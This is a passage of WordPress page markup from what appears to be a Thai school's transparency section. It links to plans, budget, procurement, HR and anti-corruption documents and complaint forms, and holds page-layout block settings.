href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 